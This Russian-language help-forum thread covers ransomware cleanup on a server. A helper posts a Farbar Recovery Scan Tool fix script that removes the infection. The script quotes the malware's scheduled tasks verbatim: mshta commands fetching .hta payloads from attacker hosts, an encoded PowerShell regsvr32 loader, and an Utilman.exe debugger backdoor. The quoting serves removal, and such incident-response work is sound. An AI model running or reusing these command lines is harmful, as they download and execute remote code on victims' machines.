• Внимание. Восстановление баз 1С7, 1C8 и Mssql после атаки шифровальщика, подробности и отзывы читайте в профильной теме.

Решена без расшифровки [email protected] 1.5.1.0.id

sweetzy

Новый пользователь
Сообщения
5
Реакции
0
Баллы
1
Добрый день,

Прошу вашей помощи с расшифровкой файлов на сервере.
Логи FRST и зашифрованные файлы во вложении.
 

Вложения

thyrex

Ассоциация VN/VIP
VIP
Сообщения
2,814
Реакции
2,559
Баллы
593
1. Выделите следующий код:
Код:
Start::
CreateRestorePoint:
(Microsoft Corporation) [File not signed] C:\Windows\services.exe
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
IFEO\Utilman.exe: [Debugger] cmd.exe
Task: {13B15947-9971-41F8-B26E-6E9670798DEC} - System32\Tasks\Microsoft\Windows\Diagnosis\ScheduledDiagnosis => cmd /c mshta hxxps://qm7gmtaagejolddt.onion.to/check.hta <==== ATTENTION
Task: {18F36BEA-9157-4E7C-B91E-2A6F24300581} - System32\Tasks\Microsoft\Windows\WDI\UPD => cmd /c mshta hxxp://eu1.minerpool.pw/upd.hta <==== ATTENTION
Task: {24774D0D-0857-40F8-A528-6724796535B2} - System32\Tasks\Microsoft\Windows\Ras\WinSockets => c:\windows\services.exe [992768 2019-07-02] (Microsoft Corporation) [File not signed] <==== ATTENTION
Task: {2AD3BA63-7A55-4E58-BE2D-AA8850FF774B} - System32\Tasks\Microsoft\Windows Defender\ScannerSchduler => cmd /c mshta hxxp://res1.myrms.pw/upd.hta <==== ATTENTION
Task: {4104DAA4-8086-4C76-AF3E-4F9A56C7297B} - System32\Tasks\Microsoft\Windows\Shell\WindowsParentalControlsSettings => cmd /c mshta hxxp://eu1.minerpool.pw/check.hta <==== ATTENTION
Task: {65088F42-FA2A-4220-8B32-FFDE153A93E0} - System32\Tasks\Microsoft\Windows\Tcpip\IpAddressConflict => cmd /c mshta hxxps://107.181.187.132/check.hta <==== ATTENTION
Task: {AEE3A4FD-C45E-43E7-8C67-9412A5D4FB52} - System32\Tasks\Microsoft\Windows\PLA\System\PlaConfig => cmd /c C:\Windows\Fonts\wwe.bat <==== ATTENTION
Task: {E62DFB06-E36F-4D04-8C13-7090CBB76695} - System32\Tasks\Microsoft\Windows\Multimedia\SystemVideoService => cmd /c powershell  -nop -noni -w 1 -enc cgBlAGcAcwB2AHIAMwAyACAALwB1ACAALwBzACAALwBpADoAaAB0AHQAcAA6AC8ALwAxADAANwAuADEAOAAxAC4AMQA4ADcALgAxADMAMgAvAHAAaABwAC8AZgB1AG4AYwAuAHAAaABwACAAcwBjAHIAbwBiAGoALgBkAGwAbAA=
S2 WindowsCertificateService; C:\Windows\Media\Long\certsvc.exe [2653184 2019-06-24] () [File not signed]
S2 WinMediaService; C:\Windows\msapss\bin\msapp.exe [2150400 2019-06-24] () [File not signed]
S4 cli_optimization_v2.0.55728_32; cmd /c mshta https://qm7gmtaagejolddt.onion.to/check.hta [X]
S2 cli_optimization_v2.0.55728_64; cmd /c mshta  http://eu1.minerpool.pw/check.hta [X]
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Siebel\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Siebel\Downloads\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Siebel\Documents\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Siebel\Desktop\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Siebel\AppData\Roaming\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Siebel\AppData\Roaming\Microsoft\Windows\Start Menu\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Siebel\AppData\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Siebel\AppData\LocalLow\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Public\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Public\Downloads\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\iserikov\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\iserikov\Downloads\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\iserikov\Documents\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\iserikov\Desktop\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\iserikov\AppData\Roaming\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\iserikov\AppData\Roaming\Microsoft\Windows\Start Menu\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\iserikov\AppData\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\iserikov\AppData\LocalLow\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Default\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Default\Downloads\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Default\Documents\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Default\Desktop\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Default\AppData\Roaming\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Default\AppData\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Default User\Downloads\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Default User\Documents\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Default User\Desktop\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Default User\AppData\Roaming\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Default User\AppData\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Administrator\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Administrator\Downloads\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Administrator\Documents\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Administrator\Desktop\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Administrator\AppData\Roaming\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Administrator\AppData\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Administrator\AppData\LocalLow\README.txt
2019-06-24 10:50 - 2019-06-24 10:50 - 000000056 _____ C:\README.txt
2019-06-24 10:25 - 2019-06-24 10:50 - 000001253 _____ C:\Users\Public\Documents\[email protected] 1.5.1.0.id-.fname-README.txt.doubleoffset
2019-06-24 10:25 - 2019-06-24 10:50 - 000001253 _____ C:\Users\Public\Desktop\[email protected] 1.5.1.0.id-.fname-README.txt.doubleoffset
2019-06-24 10:25 - 2019-06-24 10:50 - 000001253 _____ C:\Users\[email protected] 1.5.1.0.id-.fname-README.txt.doubleoffset
2019-06-24 10:25 - 2019-06-24 10:50 - 000001253 _____ C:\ProgramData\[email protected] 1.5.1.0.id-.fname-README.txt.doubleoffset
2019-06-24 10:25 - 2019-06-24 10:50 - 000000056 _____ C:\Users\README.txt
2019-06-24 10:25 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Public\Documents\README.txt
2019-06-24 10:25 - 2019-06-24 10:50 - 000000056 _____ C:\Users\Public\Desktop\README.txt
2019-06-24 10:25 - 2019-06-24 10:50 - 000000056 _____ C:\ProgramData\README.txt
2019-06-24 10:25 - 2019-06-24 10:25 - 000000056 _____ C:\ProgramData\Microsoft\Windows\Start Menu\README.txt
2019-06-24 10:25 - 2019-06-24 10:25 - 000000056 _____ C:\Program Files\README.txt
2019-06-24 10:25 - 2019-06-24 10:25 - 000000056 _____ C:\Program Files\Common Files\README.txt
2019-06-24 10:25 - 2019-06-24 10:25 - 000000056 _____ C:\Program Files (x86)\README.txt
2019-06-24 10:20 - 2019-06-10 20:39 - 000471552 _____ C:\Users\Siebel\Downloads\ruka.exe
2019-06-24 10:19 - 2019-06-24 10:19 - 000000000 ____D C:\Windows\msapss
2019-06-20 13:24 - 2019-07-02 16:13 - 000000009 _____ C:\ProgramData\zom.exe
2019-06-20 13:24 - 2019-07-02 16:13 - 000000008 _____ C:\Windows\xDLS.exe
2019-06-20 13:24 - 2019-07-02 16:13 - 000000008 _____ C:\Windows\SysWOW64\winscreen.exe
2019-06-20 13:24 - 2019-07-02 16:13 - 000000008 _____ C:\Windows\SysWOW64\winclip.exe
2019-06-20 13:24 - 2019-07-02 16:13 - 000000008 _____ C:\Windows\SysWOW64\update.exe
2019-06-20 13:24 - 2019-07-02 16:13 - 000000008 _____ C:\Windows\SysWOW64\System32.exe
2019-06-20 13:24 - 2019-07-02 16:13 - 000000008 _____ C:\ProgramData\Iostream.exe
2019-06-20 13:24 - 2019-07-02 16:12 - 000000008 _____ C:\Windows\SysWOW64\cssrs.exe
2019-06-20 13:24 - 2019-07-02 16:12 - 000000008 _____ C:\Windows\system32\cry.exe
2019-06-20 13:24 - 2019-07-02 16:10 - 000000009 _____ C:\Windows\system32\ex.exe
2019-06-20 13:24 - 2019-07-02 16:10 - 000000008 _____ C:\Windows\system32\Info.hta
2019-06-20 13:24 - 2019-07-02 15:56 - 000000008 _____ C:\Windows\system32\lock.exe
2019-06-20 13:24 - 2019-07-02 15:55 - 000000008 _____ C:\Windows\system32\8UPAB0_payload.exe
2019-06-20 13:24 - 2019-07-02 13:58 - 000992768 _____ (Microsoft Corporation) C:\Windows\services.exe
End::
2. Скопируйте выделенный текст (правая кнопка мышиКопировать).
3. Запустите Farbar Recovery Scan Tool.
4. Нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.
  • Обратите внимание: перезагрузку компьютера нужно выполнить вручную осле скрипта.
 

sweetzy

Новый пользователь
Сообщения
5
Реакции
0
Баллы
1
Добрый день,

Уточните где выполнить скрипт, Powershell?

FIXlog во вложении.
 

Вложения

sweetzy

Новый пользователь
Сообщения
5
Реакции
0
Баллы
1
Понятно, видимо FRST сам из буфера забрал скрипт.
 

thyrex

Ассоциация VN/VIP
VIP
Сообщения
2,814
Реакции
2,559
Баллы
593
Поищите пару - шифрованный_файл/оригинал_до_шифрования - и прикрепите в архиве к следующему сообщению. Размер незашифрованного файла должен быть не менее 256 байт.
 

sweetzy

Новый пользователь
Сообщения
5
Реакции
0
Баллы
1
Не удалось найти оригинальных файлов.
 

thyrex

Ассоциация VN/VIP
VIP
Сообщения
2,814
Реакции
2,559
Баллы
593
Без этого расшифровку предоставить невозможно. Стандартные обои для Рабочего стола, которые записываются на компьютер при установке системы по идее тоже должны быть зашифрованы. Найдите их оригиналы для подобной системы и будет Вам пара.
 
  • Like
Реакции: akok

Sandor

Команда форума
Супер-Модератор
Ассоциация VN/VIP
Преподаватель
Сообщения
6,196
Реакции
2,033
Баллы
643
+
Ищите такой в бэкапах, в почте, на других ПК и т.д.
 
  • Like
Реакции: akok

sweetzy

Новый пользователь
Сообщения
5
Реакции
0
Баллы
1
Добрый день,

Большое спасибо за помощь, сервер уже убили. Был бэк-ап VPS.

Можно закрыть топик.
 

akok

Команда форума
Администратор
Сообщения
18,591
Реакции
13,930
Баллы
2,203
Хорошо. Удачи!
 
Сверху Снизу